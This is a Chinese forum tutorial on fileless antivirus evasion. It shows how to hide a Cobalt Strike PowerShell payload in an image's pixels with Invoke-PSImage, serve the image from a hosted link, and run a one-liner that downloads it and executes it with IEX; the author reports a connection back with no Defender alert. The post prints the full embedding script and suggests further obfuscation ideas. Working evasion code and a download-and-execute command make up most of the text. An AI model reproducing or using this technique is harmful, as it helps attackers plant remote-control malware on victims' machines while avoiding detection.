本帖最后由 zhaorong 于 2022-5-23 15:17 编辑

0X00免杀基础

无文件落地免杀是什么？

答：无文件顾名思义，就是无需将payload文件传到目标服务器中，攻击者可以直接利用powershell或者其
他解析器的加载payload到内存中执行。它不光可以使攻击者更加隐蔽的进行攻击以及后续的横向移动同时
还可以解决目标不出网只能通过DNS上线时的棘手问题，操作还更加方便

补充：无文件落地的免杀分为两大类：一类是出网的情况，另一类是不出网情况

解析器是什么？有哪些种类？

答：解析器一般是指在windows环境下的能执行脚本或命令的组件；我们在利用解析器的时候可以根据
攻击时利用的脚本类型进行选择，eg：powershell====>powershell.exe；VB.script====>cscrip
t.exe；bat命令 ====>cmd.exe；javaSrtipt====>mshta.exe

0X01 技术验证

准备条件

一张大于等于1920*1200的图片（因为要把payload代码插入图片中，像素小了不够存放）
cobalt Strike渗透工具（版本要求不大）
Invoke-psimage脚本（这是这次免杀的关键，我们稍后分析）

payload的生成

第一步：使用CS生成.psl的payload




利用脚本进行免杀

我们可以通过git命令，将脚本下载下来git clone https://github.com/AV1080p/Invoke-PSImage.git；
然后将CS生成.psl的payload，放入Invoke-psimage这个脚本的文件夹中即可


紧接着在Invoke-psimage的文件夹中，打开powershell，输入以下两条命令:

Import-Module .\Invoke-PSImage.ps1
Invoke-PSImage -Script .\payload.ps1 -Image .\123.jpg -Out 456.jpg -Web

这里会生成一段payload代码，我们将这段代码，复制到一个.txt文本文件中，我们观察该文件发现：
通过.OpenRead（http://xxxxxx）我们可以知道，应该修改该内容，使得cs可以远程控制它


小提示：在windows环境下配置，我这里因为某些原因是在靶机上配置而成（因为是小白教程所以考虑大家
都是第一次通过powershell配置脚本，大概率会出现下面报错）

PS C:\Users\yuu\Desktop\Invoke-PSImage>Import-Module . \Invoke-PSImage.ps1
PS C:\Users\yuu\Desktop\Invoke-PSImage>Invoke-PSImage -Script . Jpayio
ad.ps1 -Image . \123. jpg -Out 456.jgWeb

如果出现报错；可以使用powershell管理员打开，后输入set-executionpolicy remotesigned
等待片刻选择Y即可


payload与cs联动

我们把456.jpg图片放入CS中，后打开Host File模块进行链接的制作



最后我们可以看见，联动的链接已经生成；我们把它放入.txt文本文件中代替原来的链接并保存



免杀验证

我们将.txt里面的payload放入powershell中运行，我们通过CS可以发现
主机上线且def没有警告



0X02 Invoke-PSImage.ps1脚本的技术分析

我们把该脚本复制下来，进行分析，看看它使用了哪些方法，以及未来我们可以怎么修改它...以达到不会被更新
的杀毒软件查杀的效果。接下来我们把脚本分成两个部分进行解读，第一部分是作者的解释，第二部分是免杀代
码第一部分是教学，即如何使用脚本，并说明脚本原理。

function Invoke-PSImage
{
<#
.SYNOPSIS（概要）
​
在图像中嵌入 PowerShell 脚本并生成 oneliner 来执行它
作者：Barrett Adams（@peewpw）
​
.DESCRIPTION（描述）
该工具既可以仅使用目标数据创建图像，也可以将有效负载嵌入现有图像。嵌入时2个颜色值（RGB的2个）的最
低有效4位每个像素（有效载荷所需的像素数）。图像质量将受到影响结果，但它看起来仍然不错。图像保存为
PNG并且可以无损压缩而不影响执行有效载荷的能力，因为数据存储在给自己上色。它可以接受大多数图像类
型作为输入，但输出始终是PNG因为它需要是无损的
​
.PARAMETER Script（参数脚本）
要嵌入到图像中的脚本的路径。
​
.PARAMETER Out（参数输出）
将生成的图像保存到的文件（图像会是PNG）
​
.PARAMETER Image（参数图像）
嵌入脚本的图像（可选）
​
.PARAMETER WebRequest（参数 WebRequest）
使用 Net.WebClient 输出用于从 Web 读取图像的命令；将需要托管图像并将 URL 插入命令中
​
.EXAMPLER PictureBox（参数图片框）
使用System.Windows.Forms.PictureBox输出用于从Web读取图像的命令；
您将需要托管图像并将URL插入命令中
​
.EXAMPLE（事列）
PS>Import-Module .\Invoke-PSImage.ps1
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg
[从文件执行的 Oneliner]
#>

接下来看第二部分代码，分析里面的免杀技巧

[CmdletBinding()] Param (
[Parameter(Position = 0, Mandatory = $True)]
[String]
$Script,

[Parameter(Position = 1, Mandatory = $True)]
[String]
$Out,

[Parameter(Position = 2, Mandatory = $False)]
[String]
$Image,
​
[switch] $WebClient,

[switch] $PictureBox
)
#如果我们遇到错误就停止而不是犯更多错误
$ErrorActionPreference = "Stop"
​
#加载一些程序集
[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing")
[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Web")

#规范化路径，因为 powershell 有时对它们不好
if (-Not [System.IO.Path]::IsPathRooted($Script)){
$Script = [System.IO.Path]::GetFullPath((Join-Path (Get-Location) $Script))
}
if (-Not [System.IO.Path]::IsPathRooted($Out)){
$Out = [System.IO.Path]::GetFullPath((Join-Path (Get-Location) $Out))
}
​
$testurl = "http://example.com/" + [System.IO.Path]::GetFileName($Out)
​
#读脚本
$ScriptBlockString = [IO.File]::ReadAllText($Script)
$in = [ScriptBlock]::Create($ScriptBlockString)
$payload = [system.Text.Encoding]::ASCII.GetBytes($in)
​
if ($Image) {
#规范化路径
if (-Not [System.IO.Path]::IsPathRooted($Image)){
$Image = [System.IO.Path]::GetFullPath((Join-Path (Get-Location) $Image))
}

#将读人的图像放入"位图"
$img = New-Object System.Drawing.Bitmap($Image)
​
$width = $img.Size.Width
$height = $img.Size.Height
​
#将位图锁定在内存中，以便可以通过编程方式对其进行更改
$rect = New-Object System.Drawing.Rectangle(0, 0, $width, $height);
$bmpData = $img.LockBits($rect, [System.Drawing.Imaging.Image
LockMode]::ReadWrite, $img.PixelFormat)
$ptr = $bmpData.Scan0
​
#将RGB值复制到数组中以便于修改
$bytes  = [Math]::Abs($bmpData.Stride) * $img.Height
$rgbValues = New-Object byte[] $bytes;
[System.Runtime.InteropServices.Marshal]::Copy($ptr, $rgbValues, 0, $bytes);
​
#检查有效载荷是否适合图像
if($bytes/2 -lt $payload.Length) {
Write-Error "Image not large enough to contain payload!"
$img.UnlockBits($bmpData)
$img.Dispose()
Break
}
​
#生成一个随机字符串用于填充图片中的其他像素信息
# (每次调用get-random太慢了)
$randstr = [System.Web.Security.Membership]::GeneratePassword(128,0)
$randb = [system.Text.Encoding]::ASCII.GetBytes($randstr)

#循环遍历RGB数组并将有效负载复制到其中
for ($counter = 0; $counter -lt ($rgbValues.Length)/3; $counter++) {
if ($counter -lt $payload.Length){
$paybyte1 = [math]::Floor($payload[$counter]/16)
$paybyte2 = ($payload[$counter] -band 0x0f)
$paybyte3 = ($randb[($counter+2)%109] -band 0x0f)
} else {
$paybyte1 = ($randb[$counter%113] -band 0x0f)
$paybyte2 = ($randb[($counter+1)%67] -band 0x0f)
$paybyte3 = ($randb[($counter+2)%109] -band 0x0f)
}
$rgbValues[($counter*3)] = ($rgbValues[($counter*3)] -band 0xf0) -bor $paybyte1
$rgbValues[($counter*3+1)] = ($rgbValues[($counter*3+1)] -band 0xf0) -bor $paybyte2
$rgbValues[($counter*3+2)] = ($rgbValues[($counter*3+2)] -band 0xf0) -bor $paybyte3
}
​
#将RGB值数组复制回位图
[System.Runtime.InteropServices.Marshal]::Copy($rgbValues, 0, $ptr, $bytes)
$img.UnlockBits($bmpData)
​
#将图像写入文件
$img.Save($Out, [System.Drawing.Imaging.ImageFormat]::Png)
$img.Dispose()

#得到一堆我们需要在oneliner中使用的数字
$rows = [math]::Ceiling($payload.Length/$width)
$array = ($rows*$width)
$lrows = ($rows-1)
$lwidth = ($width-1)
$lpayload = ($payload.Length-1)
​
if($WebClient) {
$pscmd = "sal a New-Object;Add-Type -A System.Drawing;`$g=a System.Drawing.Bitmap((a Net.WebClient).Op
enRead(`"$testurl`"));`$o=a Byte[] $array;(0..$lrows)|%{foreach(`$x in(0..$lwidth)){`$p=`$g.GetPixel(`$x,`$_);`$o[`$_*
$width+`$x]=([math]::Floor((`$p.B-band15)*16)-bor(`$p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.
GetString(`$o[0..$lpayload]))"
} elseif($PictureBox) {
$pscmd = "sal a New-Object;Add-Type -A System.Windows.Forms;(`$d=a System.Windows.Forms.PictureBox).
Load(`"$testurl`");`$g=`$d.Image;`$o=a Byte[] $array;(0..$lrows)|%{foreach(`$x in(0..$lwidth)){`$p=`$g.GetPixe
l(`$x,`$_);`$o[`$_*$width+`$x]=([math]::Floor((`$p.B-band15)*16)-bor(`$p.G -band 15))}};IEX([System.Text.Enco
ding]::ASCII.GetString(`$o[0..$lpayload]))"
} else {
$pscmd = "sal a New-Object;Add-Type -A System.Drawing;`$g=a System.Drawing.Bitmap(`"$Out`");`$o=a Byt
e[] $array;(0..$lrows)|%{foreach(`$x in(0..$lwidth)){`$p=`$g.GetPixel(`$x,`$_);`$o[`$_*$width+`$x]=([math]::Floor
((`$p.B-band15)*16)-bor(`$p.G-band15))}};`$g.Dispose();IEX([System.Text.Encoding]::ASCII.Get
String(`$o[0..$lpayload]))"
}
​
return $pscmd
​
} else {
# 决定我们的图像需要多大（为了方便数学，总是正方形）
$side = ([int] ([math]::ceiling([math]::Sqrt([math]::ceiling($payload.Length / 3)) + 3) / 4)) * 4
​
# 决定我们的图像需要多大（为了方便数学，总是正方形）
$rgbValues = New-Object byte[] ($side * $side * 3);
$randstr = [System.Web.Security.Membership]::GeneratePassword(128,0)
$randb = [system.Text.Encoding]::ASCII.GetBytes($randstr)
​
#循环遍历 RGB 数组并将有效负载复制到其中
for ($counter = 0; $counter -lt ($rgbValues.Length); $counter++) {
if ($counter -lt $payload.Length){
$rgbValues[$counter] = $payload[$counter]
} else {
$rgbValues[$counter] = $randb[$counter%113]
}
}
​
#将RGB值数组复制回位图
$ptr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($rgbValues.Length)
[System.Runtime.InteropServices.Marshal]::Copy($rgbValues, 0, $ptr, $rgbValues.Length)
$img = New-Object System.Drawing.Bitmap($side, $side, ($side*3), [System.Draw
ing.Imaging.PixelFormat]::Format24bppRgb, $ptr)
​
#将图像写入文件
$img.Save($Out, [System.Drawing.Imaging.ImageFormat]::Png)
$img.Dispose()
[System.Runtime.InteropServices.Marshal]::FreeHGlobal($ptr);

#得到一堆我们需要在oneliner中使用的数字
$array = ($side*$side)*3
$lrows = ($side-1)
$lwidth = ($side-1)
$width = ($side)
$lpayload = ($payload.Length-1)
​
if($WebClient) {
$pscmd = "sal a New-Object;Add-Type -A System.Drawing;`$g=a System.Drawing.Bitmap((a Net.
WebClient).OpenRead(`"$testurl`"));`$o=a Byte[] $array;(0..$lrows)|%{foreach(`$x in(0..$lwidth)){`$
p=`$g.GetPixel(`$x,`$_);`$o[(`$_*$width+`$x)*3]=`$p.B;`$o[(`$_*$width+`$x)*3+1]=`$p.G;`$o[(`$_*$
width+`$x)*3+2]=`$p.R}};IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..$lpayload]))"
} elseif($PictureBox) {
$pscmd = "sal a New-Object;Add-Type -A System.Windows.Forms;(`$d=a System.Windows.Forms.Pictu
reBox).Load(`"$testurl`");`$g=`$d.Image;`$o=a Byte[] $array;(0..$lrows)|%{foreach(`$x in(0..$lwidth)){`$p=
`$g.GetPixel(`$x,`$_);`$o[(`$_*$width+`$x)*3]=`$p.B;`$o[(`$_*$width+`$x)*3+1]=`$p.G;`$o[(`$_*$width+`$x
)*3+2]=`$p.R}};IEX([System.Text.Encoding]::ASCII.GetString(`$o[0..$lpayload]))"
} else {
$pscmd = "sal a New-Object;Add-Type -A System.Drawing;`$g=a System.Drawing.Bitmap(`"$Out`");`$o
=a Byte[] $array;(0..$lrows)|%{foreach(`$x in(0..$lwidth)){`$p=`$g.GetPixel(`$x,`$_);`$o[(`$_*$width+`$x)*
3]=`$p.B;`$o[(`$_*$width+`$x)*3+1]=`$p.G;`$o[(`$_*$width+`$x)*3+2]=`$p.R}};`$g.Dispose();IEX([System
.Text.Encoding]::ASCII.GetString(`$o[0..$lpayload]))"
}
​
return $pscmd
}

关于如何调用函数，调用了那些函数，函数的调用方式及可替代函数这部分，个人能力有限等一段时间
沉淀后会更新《无文件落地免杀的初尝试思考（下）》，希望不会让大家等太久。

0X03文章总结

我们通过Barrett Adams师傅GitHub里面的代码分析，我们发现免杀的本质还是加密与混淆；我们通过底层函数
的调用与"位图"的RNG隐藏躲避了def检测，那我们把这个数据流在进行Base64加密后执行呢？我们把这个数字
流通过”+“或者函数拼接呢？又或者我们改用其他不那么敏感的函数调用呢？或者用音频或者视频隐写呢？